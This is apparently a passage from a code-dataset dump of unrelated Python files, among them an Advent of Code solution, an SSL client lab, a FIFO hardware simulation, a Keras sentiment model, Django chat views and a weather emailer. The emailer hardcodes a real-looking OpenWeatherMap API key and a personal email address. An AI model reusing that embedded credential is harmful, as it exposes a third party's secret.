os.path.abspath('day5.txt')\n\nwith open(path) as f:\n content = f.readlines()\n# you may also want to remove whitespace characters like `\\n` at the end of each line\ncontent = [x.split() for x in content]\nprint(content)\n\nticket = -sys.maxsize\n\nfor i in range(len(content)):\n\n #import pudb;pu.db \n row_chars = content[i][0][:7]\n col_chars = content[i][0][7:]\n row_start = 0\n row_end = 127\n col_start = 0\n col_end = 7\n for i in range(len(row_chars)):\n val = row_chars[i]\n if val == \"F\":\n row_end = (row_end+row_start)//2\n elif val == \"B\":\n row_start = (row_end+row_start+1)//2\n row = row_end\n for val in col_chars:\n if val == \"L\":\n col_end = (col_end+col_start)//2\n elif val == \"R\":\n col_start = (col_end+col_start+1)//2\n col = col_end\n print(row,col)\n ticket_id = row*8 + col\n if ticket_id > ticket:\n ticket = ticket_id\n\nprint(ticket)\n \n\n","sub_path":"advent-of-code-20/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"370531259","text":"#Timothy Gallagher\n#IST 411 Section 001\n#W7 Solo SSL Lab\n#October 13, 2019\n\nimport ssl\nimport json\nimport socket\n\nwith open('jsonCar.json') as jsonPayload:\n datajson = json.load(jsonPayload)\nuserDataEncoded = (json.dumps(datajson)).encode('utf-8').strip()\n\n\ntry:\n\tprint(\"Client Connecting using port 8080...\")\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tssl_sock = ssl.wrap_socket(s,\n\t\tca_certs=\"server.crt\",\n\t\tcert_reqs=ssl.CERT_REQUIRED)\n\tssl_sock.connect(('localhost', 8080))\n\tprint(\"sending \"+ userDataEncoded.decode(\"UTF-8\"))\n\tssl_sock.sendall(userDataEncoded)\nexcept Exception as e:\n\tprint(e)\n#\tprint(ssl_sock.cipher())\n#\tssl_sock.close()\n","sub_path":"clientssl2.py","file_name":"clientssl2.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"36475708","text":"\nimport os\nimport sys\nfrom migen import *\nfrom litex.build.generic_platform import *\nfrom litex.build.xilinx import XilinxPlatform\n\nfrom migen.genlib.io import CRG\n\nsys.path.append(\"/home/diegoaranda/Documents/Tesis/FIFO\")\nfrom asyncfifo import AsyncFIFO\n\n\n_io = [ #generic_platform\n (\"write_clk\", 0,\n Subsignal(\"p\", Pins(\"X\")),\n Subsignal(\"n\", Pins(\"X\"))\n ),\n (\"din\",0, \n Subsignal(\"a\", Pins(\"X\")),\n Subsignal(\"b\", Pins(\"X\")),\n Subsignal(\"c\", Pins(\"X\")),\n Subsignal(\"d\", Pins(\"X\"))\n 
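day5.py above bisects rows and columns character by character. An equivalent reading of the same scheme: F/B and L/R are binary digits, so the whole 10-character boarding pass is one base-2 number and the seat ID falls out directly.

```python
# An equivalent reading of the day5.py scheme above: F/B and L/R are binary
# digits, so the seat ID (row * 8 + column) is the pass parsed in base 2.
def seat_id(boarding_pass):
    bits = boarding_pass.translate(str.maketrans('FBLR', '0101'))
    return int(bits, 2)

print(seat_id('FBFBBFFRLR'))  # -> 357, i.e. row 44 * 8 + column 5
```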
),\n (\"readable\",0, Pins(\"X\")),\n (\"writable\",0, Pins(\"X\")),\n (\"re\",0, Pins(\"X\")),\n (\"we\",0, Pins(\"X\"))\n \n]\n\n\nclass Platform(XilinxPlatform):\n def __init__(self):\n XilinxPlatform.__init__(self, \"\", _io)\n\n\nclass GTPSim(Module):\n def __init__(self, platform):\n write_clk = Signal()\n read_clk=Signal()\n\n self.submodules.crg = CRG(write_clk)\n \n \n write_clk100 = Signal()\n write_clk100_pads = platform.request(\"write_clk\")\n self.specials += [\n Instance(\"IBUFDS_GTE2\",\n i_CEB=0,\n i_I=write_clk100_pads.p,\n i_IB=write_clk100_pads.n,\n o_O=write_clk100),\n Instance(\"BUFG\", i_I=write_clk100, o_O=write_clk)\n ]\n \n \n pll_fb = Signal()\n self.specials += [\n Instance(\"PLLE2_BASE\",\n p_STARTUP_WAIT=\"FALSE\", #o_LOCKED=,\n\n # VCO @ 1GHz\n p_REF_JITTER1=0.01, p_CLKIN1_PERIOD=10.0,\n p_CLKFBOUT_MULT=10, p_DIVCLK_DIVIDE=1,\n i_CLKIN1=write_clk, i_CLKFBIN=pll_fb, o_CLKFBOUT=pll_fb,\n\n # 200MHz\n p_CLKOUT0_DIVIDE=5, p_CLKOUT0_PHASE=0.0, o_CLKOUT0=read_clk\n ),\n ]\n \n async_fifo=AsyncFIFO(width=8, depth=8)\n self.submodules+=async_fifo\n self.din=Signal(4)\n self.writable=Signal()\n self.readable=Signal()\n self.we=Signal()\n self.re=Signal()\n \n self.din=platform.request(\"din\")\n self.writable=platform.request(\"writable\")\n self.readable=platform.request(\"readable\")\n self.we=platform.request(\"we\")\n self.re=platform.request(\"re\")\n \n\n async_fifo=ClockDomainsRenamer({\"write\": \"sys\", \n \"read\":\"user_domain\"})(async_fifo)\n\n self.clock_domains.cd_read=ClockDomain(name=\"user_domain\")\n self.clock_domains.cd_read_por = ClockDomain(reset_less=True)\n \n\n int_read_rst = Signal(reset=1)\n self.sync.read_por += int_read_rst.eq(0)\n self.comb += [\n self.cd_read.clk.eq(read_clk),\n self.cd_read.rst.eq(int_read_rst),\n self.cd_read_por.clk.eq(read_clk),\n ]\n\n self.comb+=[\n async_fifo.din.eq(Cat(self.din.a,self.din.b,self.din.c,self.din.d,)),\n self.readable.eq(async_fifo.readable),\n self.writable.eq(async_fifo.writable),\n async_fifo.re.eq(self.re),\n async_fifo.we.eq(self.we)\n \n ]\n\n\n \n\n \ndef generate_top():\n platform = Platform()\n soc = GTPSim(platform)\n platform.build(soc, build_dir=\"./\", run=False)\n\ndef generate_top_tb():\n f = open(\"top_tb.v\", \"w\")\n f.write(\"\"\"\n`timescale 1ns/1ps\n\nmodule top_tb();\n\nreg write_clk;\ninitial write_clk = 1'b1;\nalways #5 write_clk = ~write_clk;\n\nreg[3:0] counter;\ninitial counter=4'b0; \n\nreg din_a, din_b, din_c, din_d;\n\nreg we, re;\ninitial we=0;\ninitial re=0;\n\nwire writable;\n\ntop dut (\n .write_clk_p(write_clk),\n .write_clk_n(~write_clk),\n .din_a(din_a),\n .din_b(din_b),\n .din_c(din_c),\n .din_d(din_d),\n .we(we),\n .writable(writable),\n .re(re)\n);\nreg bandera;\ninitial bandera=0;\ninitial begin\n for (integer i=0;i<=37;i=i+1) begin\n #10;\n end\n bandera=1;\nend\n\nalways @(posedge write_clk)\nbegin \n if (bandera) begin \n if(writable && counter<=7) begin\n counter=counter+1;\n we=1;\n re=0;\n din_a=counter[0];\n din_b=counter[1];\n din_c=counter[2];\n din_d=counter[3];\n end else begin\n we=0;\n re=1;\n end\n end\n\n\nend\n\n\n\nendmodule\"\"\")\n f.close()\n\ndef run_sim():\n os.system(\"rm -rf xsim.dir\")\n os.system(\"xvlog glbl.v\")\n os.system(\"xvlog top.v\")\n os.system(\"xvlog top_tb.v\")\n os.system(\"xelab -debug typical top_tb glbl -s top_tb_sim -L unisims_ver -L unimacro_ver -L SIMPRIM_VER -L secureip -L $xsimdir/xil_defaultlib -timescale 1ns/1ps\")\n os.system(\"xsim top_tb_sim -gui\")\n\ndef main():\n generate_top()\n generate_top_tb()\n 
run_sim()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"full_mode_rx/TX/FIFO/fifo_prueba/fifo_sim.py","file_name":"fifo_sim.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"634814288","text":"from setuptools import setup, find_packages\nfrom os import path\n\npackageName = \"pygeomesh\"\n\nthis_directory = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\n# version scheme: major.minor.patch\nversionInfo = 0, 1, 1\n\n__version__ = \".\".join(map(str, versionInfo))\n\n\nsetup(\n name=packageName,\n version=__version__,\n author=\"PuQing\",\n author_email=\"me@puqing.work\",\n packages=find_packages(),\n description=\"PyGeomesh is a tool for generating discretized points from geometry.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/AndPuQing/PyGeomesh\",\n download_url=\"https://pypi.python.org/pypi/pygeomesh\",\n license=\"Apache License 2.0\",\n platforms=\"any\",\n requires=[\n \"numpy\",\n \"scipy\",\n \"matplotlib\",\n ],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Intended Audience :: Science/Research\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"173490544","text":"import numpy as np\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\n\nseed = 7\n\nnp.random.seed(seed)\n\ntop_words = 5000\n(X_train, Y_train), (X_test, Y_test) = imdb.load_data(num_words = top_words)\n\nmax_words = 500\nX_train = sequence.pad_sequences(X_train, maxlen = max_words)\nX_test = sequence.pad_sequences(X_test, maxlen = max_words)\n\nmode = Sequential()\nmode.add(Embedding(top_words,32,input_length=max_words))\nmode.add(Flatten())\nmode.add(Dense(250,activation='relu')) #rectifier activation fn f(X) = max(0,X)\nmode.add(Dense(1,activation='sigmoid'))\n\nmode.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n# sgd - Stochastic gradient descent optimizer. accuracy = 50% while adam has an accuracy of 86%\n\nprint(mode.summary())\n\nmode.fit(X_train,Y_train, validation_data=(X_test,Y_test),epochs=5, batch_size=128, verbose=1)\n\nprint(\"\\n\\nbeginning the Training process\\n\\n\")\n\nscores = mode.evaluate(X_test, Y_test, verbose=1)\n\n#verbose =0 for no logging, =1 for progress bar logging and =2 for one line logging per epoch\nprint(\"Accuracy %f%%\"%(scores[1]*100))\n\n\n# learning rate for adam is 0.001\n# learning rate decay over each update is 0. 
ie learning rate remains the same for all the epochs\n","sub_path":"softcomputing/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"20912587","text":"#!/usr/bin/python3\n\n# Dependency : sortedcontainers\n# - installation: pip install sortedcontainers\n# Everything else should be in the standard library\n# Tested on cpython 3.4.3\n\nfrom enum import Enum, unique\nfrom sortedcontainers import SortedSet\nimport argparse\nimport re\nimport csv\nimport sys\nimport datetime\nimport random\n\nclass Job:\n\tdef __init__(self,\n\t job_id,\n\t nb_res,\n\t wait_time,\n\t run_time,\n\t submit_time,\n\t wall_time):\n\t\tself.job_id = job_id\n\t\tself.nb_res = nb_res\n\t\tself.wait_time = wait_time\n\t\tself.run_time = run_time\n\t\tself.submit_time = submit_time\n\t\tself.wall_time = wall_time\n\n\t\tself.start_time = self.submit_time + self.wait_time\n\t\tself.finish_time = self.start_time + self.run_time\n\t\tself.turnaround_time = self.finish_time - self.submit_time\n\t\tself.stretch = self.turnaround_time / self.nb_res\n\n\t\tself.resources = SortedSet()\n\ndef take_first_resources(available_res, nb_res_to_take):\n\tassert(len(available_res) >= nb_res_to_take), 'Invalid schedule. Want to use {} resources whereas only {} are available ({})'.format(\n\t\tnb_res_to_take, len(available_res), available_res)\n\tallocation = SortedSet()\n\tl = list(available_res)\n\n\tfor i in range(nb_res_to_take):\n\t\tallocation.add(l[i])\n\n\tavailable_res.difference_update(allocation)\n\n\tif len(available_res) > 0:\n\t\tmin_available_res = min(available_res)\n\t\tfor res in allocation:\n\t\t\tassert(res < min_available_res), \"Invalid sort\"\n\n\treturn (available_res, allocation)\n\n@unique\nclass SwfField(Enum):\n\tJOB_ID=1\n\tSUBMIT_TIME=2\n\tWAIT_TIME=3\n\tRUN_TIME=4\n\tALLOCATED_PROCESSOR_COUNT=5\n\tAVERAGE_CPU_TIME_USED=6\n\tUSED_MEMORY=7\n\tREQUESTED_NUMBER_OF_PROCESSORS=8\n\tREQUESTED_TIME=9\n\tREQUESTED_MEMORY=10\n\tSTATUS=11\n\tUSER_ID=12\n\tGROUP_ID=13\n\tAPPLICATION_ID=14\n\tQUEUD_ID=15\n\tPARTITION_ID=16\n\tPRECEDING_JOB_ID=17\n\tTHINK_TIME_FROM_PRECEDING_JOB=18\n\nparser = argparse.ArgumentParser(description='Reads a CSV Batsim jobs output file and transforms it into a SWF (Standard Workload Format) file')\nparser.add_argument('inputCSV', type=argparse.FileType('r'), help='The input CSV file')\nparser.add_argument('outputSWF', type=argparse.FileType('w'), help='The output SWF file')\n\nargs = parser.parse_args()\n\n#######################\n# Input CSV traversal #\n#######################\njobs = {}\nreader = csv.DictReader(args.inputCSV)\n\nfor row in reader:\n\tjob_id = int(row[\"job_id\"])\n\tsubmit_time = float(row[\"submission_time\"])\n\tnb_res = int(row[\"requested_number_of_processors\"])\n\twall_time = float(row[\"requested_time\"])\n\trun_time = float(row[\"execution_time\"])\n\twait_time = float(row[\"waiting_time\"])\n\n\tsuccess = bool(int(row[\"success\"]) == 1)\n\n\tif success and (nb_res > 0):\n\t\tjob = Job(job_id = job_id,\n\t nb_res = nb_res,\n\t wait_time = wait_time,\n\t run_time = run_time,\n\t submit_time = submit_time,\n\t wall_time = wall_time)\n\n\t\tjobs[job_id] = job\n\n#####################\n# Output SWF export #\n#####################\n\nwriter = csv.DictWriter(args.outputSWF,\n delimiter = ' ',\n fieldnames = ['job_id',\n 'submit_time',\n 'wait_time',\n 'run_time',\n 'nb_res_used',\n 'avg_cputime',\n 'used_memory',\n 'nb_res_requested',\n 
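In the IMDB record above, `sequence.pad_sequences` forces every review to a fixed length before the `Embedding` layer. A tiny illustration of its default pre-padding behaviour:

```python
# Tiny illustration of the sequence.pad_sequences call used above: shorter
# sequences are pre-padded with zeros so every sample has the same length.
from keras.preprocessing import sequence

batch = [[1, 2, 3], [4, 5]]
print(sequence.pad_sequences(batch, maxlen=4))
# [[0 1 2 3]
#  [0 0 4 5]]
```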
'walltime',\n 'requested_memory',\n 'status',\n 'user_id',\n 'group_id',\n 'exec_id',\n 'queue_id',\n 'partition_id',\n 'preceding_job_id',\n 'think_time_from_preceding_job'])\n\nfor job_id in jobs:\n\tjob = jobs[job_id]\n\n\td = {'job_id' : job.job_id,\n 'submit_time' : job.submit_time,\n 'wait_time' : job.wait_time,\n 'run_time' : job.run_time,\n 'nb_res_used' : job.nb_res,\n 'avg_cputime' : -1,\n 'used_memory' : -1,\n 'nb_res_requested' : job.nb_res,\n 'walltime' : job.wall_time,\n 'requested_memory' : -1,\n 'status' : 1,\n 'user_id' : -1,\n 'group_id' : -1,\n 'exec_id' : -1,\n 'queue_id' : -1,\n 'partition_id' : -1,\n 'preceding_job_id' : -1,\n 'think_time_from_preceding_job' : -1}\n\n\twriter.writerow(d)\n","sub_path":"tools/batsim_output_csv_to_swf.py","file_name":"batsim_output_csv_to_swf.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"275412262","text":"from django.shortcuts import render, get_object_or_404\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect, HttpResponse, Http404, JsonResponse, QueryDict, HttpRequest\nfrom django.contrib.auth.decorators import login_required\nfrom UserProfile.models import UserExt, save_attach\nfrom .models import Chat, Message, Member, MessageAttachment\nfrom UserProfile.forms import AttachmentForm\nfrom .forms import MessageForm, ChatForm, ChatMember\nfrom django.utils.safestring import mark_safe\nimport json\nfrom datetime import datetime\nfrom Lib.FileFormats import handle_uploaded_file\n\n\ndef add_members(request, chat_slug):\n context = {\n 'status': 'success',\n }\n chat = get_object_or_404(Chat, slug=chat_slug)\n if not chat.is_creator(request.user):\n raise Http404\n\n if request.method == 'POST':\n members_form = ChatMember(request.POST)\n if members_form.is_valid():\n members_list = members_form.cleaned_data['members']\n\n for member in members_list:\n if not chat.member_set.filter(user=member):\n new_member = Member(chat=chat, user=member)\n new_member.save()\n else:\n context['status'] = 'error'\n\n return JsonResponse(context)\n else:\n members_form = ChatMember()\n\n context['members_form'] = members_form\n\n return render(request, 'Chat/chat_member_form.html', context)\n\n\ndef create_conversation(request):\n context = {\n 'status': 'success',\n }\n path = request.META['HTTP_REFERER']\n from_house = path.find('/house/')\n from_user = path.find('/user/')\n\n redirect = False\n if from_house > 0 or from_user > 0:\n redirect = True\n print(redirect)\n\n if request.method == 'POST':\n members_form = ChatMember(request.POST)\n if members_form.is_valid():\n print('created')\n try:\n opponent = UserExt.objects.get(username=request.POST['members'])\n user = request.user\n\n chat = Chat.chat_objects.has_conversation(user, opponent)\n\n if not chat:\n chat_name = \"%s|%s\" 
% (user.username, opponent.username)\n chat = Chat(name=chat_name, chat_type=Chat.P2P)\n chat.save()\n\n member1 = Member(chat=chat, user=opponent)\n member2 = Member(chat=chat, user=user)\n\n member1.save()\n member2.save()\n context['mini_chat'] = render_to_string('Chat/chat_mini_block.html',\n {'chat': chat})\n context['slug'] = chat.slug\n\n\n except UserExt.DoesNotExist:\n context['status'] = 'user_not_exit'\n else:\n print(members_form.errors)\n\n if redirect:\n print(reverse('chat.page'))\n return HttpResponseRedirect(reverse('chat.page') + \"#\" + chat.slug)\n return JsonResponse(context)\n else:\n members_form = ChatMember()\n\n context['members_form'] = members_form\n context['conversation'] = True\n\n return render(request, 'Chat/chat_member_form.html', context)\n\n\ndef create_chat(request):\n context = {\n 'status': 'success',\n }\n exs_chat = None\n if 'chat_slug' in request.GET:\n try:\n exs_chat = Chat.objects.get(slug=request.GET['chat_slug'])\n except Chat.DoesNotExist:\n exs_chat = None\n\n user = UserExt.objects.get(id=request.user.id)\n if request.method == 'POST':\n chat_form = ChatForm(request.POST, request.FILES)\n\n if chat_form.is_valid():\n if exs_chat:\n chat = chat_form.save(exs_chat)\n else:\n chat = chat_form.save()\n member = Member(chat=chat, user=user, status=Member.CREATOR)\n member.save()\n print(chat)\n chat.title = chat.get_chat_title(user)\n context['mini_chat'] = render_to_string('Chat/chat_mini_block.html',\n {'chat': chat})\n context['slug'] = chat.slug\n\n return JsonResponse(context)\n\n else:\n if exs_chat:\n chat_form = ChatForm(initial={'name': exs_chat.name,\n 'chat_type': exs_chat.chat_type})\n else:\n chat_form = ChatForm()\n\n context['chat_form'] = chat_form\n context['is_creating'] = True\n return render(request, 'Chat/chat_create_form.html', context)\n\n\ndef get_user(request):\n if 'q' in request.GET:\n\n try:\n user = UserExt.objects.filter(username=request.GET['q']).values('username', 'id')[0]\n user_data = []\n user_data.append({'name': user['username']})\n user_data.append({'id': user['id']})\n return JsonResponse({'user_data': user_data})\n except IndexError:\n return HttpResponse('none')\n\n\ndef load_users(request):\n if 'q' in request.GET:\n\n users = UserExt.objects.filter(username__istartswith=request.GET['q']).values('username')\n users_list = []\n for user in users:\n if user['username'] != request.user.username:\n users_list.append({'name': user['username']})\n return JsonResponse({'users_list': users_list})\n return HttpResponse('uncorrected request')\n\n\n@login_required\ndef chat_list(request):\n\n user = UserExt.objects.get(id=request.user.id)\n chats = Chat.chat_objects.users_chats(user.id).order_by(\"name\")\n print(open)\n chats_list = []\n for chat in chats:\n chat.user_new_message = chat.has_new_messages(user)\n chat.image = chat.get_image(user)\n chat.title = chat.get_chat_title(user)\n chats_list.append(chat)\n\n context = {\n 'chats': chats_list,\n }\n return render(request, 'Chat/chats_page.html', context)\n\n\ndef chat_block(request, chat_slug):\n user = UserExt.objects.get(id=request.user.id)\n chat = get_object_or_404(Chat, slug=chat_slug)\n\n try:\n member = chat.member_set.get(user=user)\n except Member.DoesNotExist:\n raise Http404\n\n if 'since' in request.GET:\n date_since = datetime.strptime(request.GET['since'], '%d-%m-%Y %H:%M')\n messages = Message.message_object.last_10_messages(chat, date_since)\n\n return render(request, 'Chat/messages_list.html', {'messages': messages})\n\n messages = 
Message.objects.filter(chat=chat).order_by('-date')[0:10]\n chat_title = member.user_chat_title()\n context = {\n 'chat': chat,\n 'messages': messages,\n 'members_form': ChatMember(),\n 'chat_title': chat_title,\n\n }\n if chat.is_creator(user):\n context['creator'] = True\n return render(request, 'Chat/chat_block.html', context)\n\n\ndef create_message(request):\n\n user = UserExt.objects.get(id=request.user.id)\n\n print(request.POST)\n print(request.FILES)\n errors_file_type = []\n\n if request.method == 'POST':\n\n chat = get_object_or_404(Chat, slug=request.POST['chat_slug'])\n\n form_message = MessageForm(request.POST)\n form_attach = AttachmentForm(request.FILES)\n\n if form_message.is_valid():\n errors_file_type = (handle_uploaded_file(request.FILES))\n if not len(form_message.cleaned_data['text']) and not (len(request.FILES)):\n errors_file_type.append('empty')\n else:\n message = form_message.save(user, chat)\n save_attach(request.FILES, message, MessageAttachment)\n\n return JsonResponse({'message': message.id})\n else:\n form_message = MessageForm()\n form_attach = AttachmentForm()\n\n return render(request, 'Chat/form_message_block.html', {\n 'form_message': form_message,\n 'form_attach': form_attach,\n 'errors_file_type': errors_file_type\n })\n\n\ndef chat_delete(request):\n if request.POST:\n try:\n chat = Chat.objects.get(slug=request.POST['chat_slug'])\n member = chat.member_set.filter(user=request.user)\n if member:\n member.delete()\n except Chat.DoesNotExist:\n return JsonResponse({'error': \"chat isn't exist\"})\n\n return JsonResponse({'deleted': \"success\"})\n","sub_path":"Chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"520458627","text":"import requests\nimport smtplib\n\n\ndef get_emails():\n emails = {}\n email_file = \"\"\n try:\n email_file = open('emails.txt', 'r')\n\n for line in email_file:\n email, name = line.split(',')\n emails[email] = name.strip()\n except FileNotFoundError as err:\n print(err)\n\n return emails\n\n\ndef get_schedule():\n schedule = None\n try:\n schedule_file = open('schedule.txt', 'r')\n schedule = schedule_file.read()\n except FileNotFoundError as err:\n print(err)\n\n return schedule\n\n\ndef get_weather():\n url = 'http://api.openweathermap.org/data/2.5/find?q=Chicago&units=imperial&appid=fba15d720616ae163a79b35c5d143717'\n r = requests.get(url)\n json = r.json()\n\n if len(json['list']) > 0:\n description = json['list'][0]['weather'][0]['description']\n temp_min = json['list'][0]['main']['temp_min']\n temp_max = json['list'][0]['main']['temp_max']\n else:\n description = json['weather'][0]['description']\n temp_min = json['main']['temp_min']\n temp_max = json['main']['temp_max']\n\n forecast = \"The weather for today is {0} with a high of {1} and a low of {2}.\".format(description,\n int(temp_max),\n int(temp_min))\n\n return forecast\n\n\ndef send_email(emails, schedule, forecast):\n sender = 'johnnyk737@gmail.com'\n receiver = 'johnnyk737@gmail.com'\n\n\n smtpObj = smtplib.SMTP('smtp.gmail.com', '587', timeout=60)\n #smtpObj.set_debuglevel(True)\n smtpObj.starttls()\n password = input(\"What is your password? 
\")\n smtpObj.login('johnnyk737', password)\n\n #send email to entire list\n\n for to_email, name in emails.items():\n message = 'Subject: Welcome to the Circus!\\n'\n message += 'Hi {0},\\n\\n'.format(name)\n message += forecast + '\\n\\n'\n message += schedule + '\\n\\n'\n message += 'Hope to see you there!'\n smtpObj.sendmail(sender, to_email, message)\n\n\n smtpObj.quit()\n print(\"email sent\")\n return message\n\n\ndef main():\n emails = get_emails()\n\n sched = get_schedule()\n\n forecast = get_weather()\n\n print(send_email(emails, sched, forecast))\n\n\nmain()\n","sub_path":"Emailer/emailer.py","file_name":"emailer.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"578478220","text":"#!/usr/bin/env python\n###############################################################################\n#\n# cext_traffic_assign.py - traffic assignment by greedy method\n#\n# File: cext_traffic_assign.py\n# Author: Alex Stivala\n# Created: March 2011\n#\n# OBSOLETE - use C implementation in tap/ now\n#\n# $Id: cext_traffic_assign.py 641 2011-09-01 01:40:52Z astivala $\n# \n###############################################################################\n\n\"\"\"\nTraffic assignment by greedy algorithm.\n\nThis implementation uses a python extension written in C\n(from ../python_extension/) to do\nDijkstra's algorithm to make it faster (since > 90% of time is spent\ndoing shortest path computations).\n\n\nOBSOLETE - not using this any more, using cext_pape_traffic_assign.py\ninstead after finding overhead of C/Python interface too great (fixed\nthis by converting to internal C data structure earlier in cext_pape)\n\"\"\"\n\nimport sys,os\nfrom time import strftime,localtime,clock\nfrom math import ceil,floor\n\nfrom cdijkstra import dijkstra\nfrom parsetapfiles import *\n\n\n\n#-----------------------------------------------------------------------------\n#\n# Constants\n#\n#-----------------------------------------------------------------------------\n\n# steps in cost step function\nNUM_STEPS = 3.0\n\n\n#-----------------------------------------------------------------------------\n#\n# Function definitions\n#\n#-----------------------------------------------------------------------------\n\ndef total_link_cost(net):\n \"\"\"\n Compute the total of link costs (volume * costfunction(volume))\n over all links at current volumes on those links\n\n Parameters:\n net - Net object as returned by parse_net_file()\n\n Return value:\n total link cost\n \"\"\"\n return sum([link.volume * link.cost for link in net.links])\n\ndef cost_step(link, volume):\n \"\"\"\n Given a Link object and volume on that link, return the step\n (in the division of volume up to capacity) that the volume is at\n step function at that volume\n\n Parameters:\n link - Link object\n volume- volume to get cost for on link\n\n Return value:\n step (0, 1, .. 
NUM_STEPS) that the volume is at on that link\n    \"\"\"\n    if volume >= link.capacity:\n        return NUM_STEPS\n    flowstepsize = link.capacity / NUM_STEPS\n    step = floor(volume / flowstepsize)\n    return step\n\ndef distance_from_next_step(link):\n    \"\"\"\n    Given a Link object return the distance (volume difference) from\n    the point where it will go up to the next step in the step cost function\n\n    Parameters:\n       link - Link object\n\n    Return value:\n       distance (additional volume required) to go to next step in cost step fn\n    \"\"\"\n    flowstepsize = link.capacity / NUM_STEPS\n    if link.volume == 0.0:\n        return flowstepsize\n    elif link.volume >= link.capacity:\n        return float(\"inf\")\n    next_step = ceil(link.volume / flowstepsize)\n    next_step_vol = next_step * flowstepsize\n    if next_step_vol == link.volume:\n        return flowstepsize\n    else:\n        return next_step_vol - link.volume\n    \ndef cost_step_function(link, volume):\n    \"\"\"\n    Given a Link object and volume on that link, return the value of cost\n    step function at that volume\n\n    Parameters:\n       link - Link object\n       volume- volume to get cost for on link\n\n    Return value:\n       cost at volume on link\n    \"\"\"\n    step = cost_step(link, volume)\n    coststepsize = 2.0 # FIXME \n    if volume > link.capacity:\n        cost = link.free_flow_time + step * coststepsize # TODO something else?\n    else:\n        cost = link.free_flow_time + step * coststepsize\n\n    return cost\n    \n\n\ndef get_shortest_path(pred, orig, dest):\n    \"\"\"\n    Get the shortest path to dest given the predecessor list pred\n    from Dijkstra's algorithm\n\n    Parameters:\n       pred - list of predecessor nodes from Dijkstra's algorithm with orig \n              as source\n       orig - source node\n       dest - destination node\n\n    Return value:\n       list of nodes on shortest path to dest from orig\n    \"\"\"\n    path = []\n    v = dest\n    while v != orig:\n#        if v == -1:\n#            break\n        path.append(v)\n        v = pred[v]\n    path.append(orig)\n    path.reverse()\n    return path\n\n\ndef assign(net, demands, demandsdict, linkdict):\n    \"\"\"\n    Assign flow from O-D demands to links according to current shortest\n    paths (lowest costs) on netgraph\n    Assigns flow to path only up to the amount of flow that\n    takes the first link to do so up to the next step in cost function,\n    subtracting that assigned flow from the O-D demand using that path\n\n    Parameters:\n       net - Net object as returned by parse_net_file()\n       demands (in/out) - dict of dicts { origin : { destination : demand } }\n                 from parse_trips_file()\n       demandsdict (in/out) - O-D demand data represented as {(orig,dest):demand}\n                 from demands_to_demanddict(demands)\n       linkdict (in/out) - dict {(from,to):Link} of Link objects with volume\n                 attribute assigned according to shortest paths\n\n\n    Return value:\n       None.\n    \"\"\"\n    netgraph = net_to_graph(net)\n    for (orig, demand_dict) in demands.iteritems():\n#        sys.stderr.write(\"running dijkstra for orig %d...\" % orig)\n        t0 = clock()\n        pred = dijkstra(netgraph, net.num_nodes+1, orig)\n        t1 = clock()\n#        sys.stderr.write(\"done (%f ms).\\n\" % ((t1 - t0)*1000))\n        for (dest, routeflow) in demand_dict.iteritems():\n            if orig == dest or routeflow == 0.0:\n                continue\n            pathnodes = get_shortest_path(pred, orig, dest)\n            if len(pathnodes) < 2:\n                continue\n            path = zip(pathnodes, pathnodes[1:]) #convert to list of edge tuples\n            path_links = [linkdict[from_to_tuple] for from_to_tuple in path]\n            # assign flow to path only up to the amount of flow that\n            # takes the first link to do so up to the next step in cost function\n            addflow = min(routeflow,\n                          min([distance_from_next_step(link) for link in 
path_links]))\n for link in path_links:\n link.volume += addflow\n demandsdict[(orig, dest)] -= addflow\n demand_dict[dest] -= addflow \n\n\ndef update_link_costs(net):\n \"\"\"\n Update the cost element in each Link with using cost step function\n and volume\n \"\"\"\n for link in net.links:\n link.cost = cost_step_function(link, link.volume)\n\n\ndef print_flow(fh, net, linkdict):\n \"\"\"\n Output the flow data giving volume and cost from output of traffic assign\n \n Paraemters:\n fh - open (write) filehande to write flow data to\n net - Net object as returned by parse_net_file()\n linkdict - dict {(from,to):Link} of Link objects with volume\n attribute assigned according to shortest paths\n\n Return value:\n None.\n\n Output volume and cost on each link in format like:\n\n 25\n 76\n \n\n ~ Tail Head : Volume Cost ;\n 1 2 : 4494.5008499645437041 6.0008161234622576785 ;\n 1 3 : 8119.1900669362912595 4.0086912217072878661 \n\n \"\"\"\n assert(net.num_links == len(list(linkdict.iterkeys())))\n fh.write(\"\\t%d\\n\" % net.num_nodes)\n fh.write(\"\\t%d\\n\" % net.num_links)\n fh.write(\"\\n\")\n 